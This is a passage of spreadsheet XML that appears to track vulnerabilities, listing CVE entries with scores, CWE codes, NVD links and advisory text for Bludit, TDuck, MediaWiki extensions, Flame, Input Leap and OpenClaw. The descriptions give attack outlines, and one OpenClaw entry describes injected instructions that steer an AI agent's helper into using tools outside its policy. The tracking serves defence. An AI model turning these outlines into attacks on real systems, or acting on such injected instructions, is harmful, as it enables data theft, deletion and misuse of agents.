        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains an authorization bypass vulnerability that allows authenticated users with the Author role to enumerate and delete media files belonging to pages owned by other users, including administrators, by supplying arbitrary uuid parameters to unprotected AJAX endpoints. Attackers can retrieve page UUIDs for all users via the content-get-list endpoint and then submit crafted POST requests to the list-images and delete-image endpoints in bl-kernel/ajax/ to access and destroy media files outside their own pages, bypassing the IMAGE_RESTRICT isolation control.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93366</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100230</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Input Leap (aka input-leap) through 3.0.3, when the non-default --enable-drag-drop option is used on Windows or macOS, mishandles the / versus \ distinction and allows directory traversal, with resultant code execution if a file is written to a startup directory. This occurs via a DDRG message.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100230</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100304</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form 6.0 contains an information disclosure vulnerability in FormAuthUtils.hasPermission that fails open when a form does not exist, allowing authenticated users to access deleted form submissions. Attackers can read orphaned submission data including personal information by providing a known dataId to the GET /user/form/data/details endpoint after the form has been permanently deleted.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100304</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100306</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through 6.0 fails to validate write passwords on submission endpoints, enforcing the check only on the front end. Remote unauthenticated attackers can submit form entries directly to public submission APIs without providing the password by using the form key from share links.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100306</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100378</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Wikimedia Foundation Mediawiki - Translate Extension allows Accessing Functionality Not Properly Constrained by ACLs.
This issue affects Mediawiki - Translate Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100378</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100379</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Wikipedia Android App allows Accessing/Intercepting/Modifying HTTP Cookies.
This issue affects Wikipedia Android App: main.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100379</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100380</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - Wikibase Extension allows Cross-Site Scripting (XSS).
This issue affects Mediawiki - Wikibase Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100380</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100381</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - UploadWizard Extension allows Cross-Site Scripting (XSS).
This issue affects Mediawiki - UploadWizard Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100381</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100418</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Flame through 2.4.0 contains an information exposure vulnerability in the unauthenticated GET /api/config endpoint that returns the entire configuration object without field redaction. Attackers can retrieve the stored weather API key and internal operational settings by sending a single unauthenticated request to consume provider quota or access sensitive configuration data.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100418</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100526</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>OpenClaw's Discord integration (npm package @openclaw/discord) before version 2026.9.3 could lose the sender-scoped media policy in the emoji and sticker upload actions before loading a local file. A sender permitted to invoke those actions could cause OpenClaw to read a host path that the same sender's configured media roots would otherwise reject, placing bytes from an out-of-policy local file into an outbound emoji or sticker upload. Exploitation requires access to the guild asset action and knowledge or derivation of a useful local path; the issue does not permit unrestricted filesystem browsing or code execution. The issue is fixed in @openclaw/discord 2026.9.3.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100526</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100527</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>OpenClaw before 2026.8.2 contains a denial of service vulnerability in the Browser extension relay that allows unauthenticated network sources to exhaust pending-authentication capacity. Attackers can hold every pending slot by maintaining silent WebSocket upgrades, preventing paired extensions from completing Browser Relay Authentication v2.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100527</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100533</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a path traversal vulnerability in the tools.fs.workspaceOnly feature where Unicode filename fallback can normalize validated parent directory components. Admitted requesters can exploit canonically equivalent sibling directories to read files outside the configured workspace boundary.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100533</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100545</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>npm, gin, rust</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.8.1 incorrectly enforces sender tool policies during session-memory filename generation. In affected versions, filename generation created an embedded helper that retained tools which the originating sender's policy had removed. When session-memory filename generation was enabled for an agent reachable by lower-trust senders, model-mediated instructions could cause the helper to invoke tools outside that sender's effective policy; the demonstrated impact was the creation of persistent scheduled work. Exploitability depends on the model acting on the injected instruction and on which tools the helper exposes. The issue is fixed in 2026.8.1; as a workaround, disable session-memory filename generation for agents reachable by lower-trust senders.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100545</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100548</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.28 and &lt; 2026.8.1 contain a credential exposure issue in memory embedding failover. When remote embedding fallback is configured and the primary embedding provider fails, the request can be sent to a different fallback provider while still reusing the primary provider's configured API key, causing that credential to be transmitted as a bearer token to an unintended vendor. The practical impact depends on the configured providers, whether failover occurs, and the privileges attached to the primary provider key. The issue is fixed in 2026.8.1; as a workaround, disable cross-provider embedding fallback or configure each provider with separate, narrowly scoped credentials.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100548</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100571</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>tempo, npm, requests, rust</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.6.6 and &lt; 2026.8.1 apply the SMS webhook invalid-request rate limit before Twilio signature verification and identify clients only by the raw proxy socket address. In deployments where the SMS/Twilio webhook sits behind a trusted reverse proxy or tunnel so that multiple external clients share one socket address, an unauthenticated remote sender can exhaust the shared pre-authentication rate-limit budget with invalid requests, causing subsequent correctly signed Twilio callbacks to receive HTTP 429 responses. The result is temporary inbound SMS loss while the shared window remains exhausted; the attacker cannot forge a callback or access message data. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100571</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100572</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>tempo, rust</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions &gt;= 2026.3.25 and &lt; 2026.8.1 apply invalid-token rate limiting for Synology Chat webhooks before authentication and key the limit on the raw proxy socket address. In deployments where OpenClaw sits behind a trusted reverse proxy or tunnel and multiple external clients share a single socket address, an unauthenticated sender can exhaust the shared invalid-token budget, causing subsequent legitimate Synology Chat webhook callbacks to be rejected until the rate-limit window expires. The attacker cannot obtain a valid token or read message data; the impact is temporary loss of channel availability. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100572</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
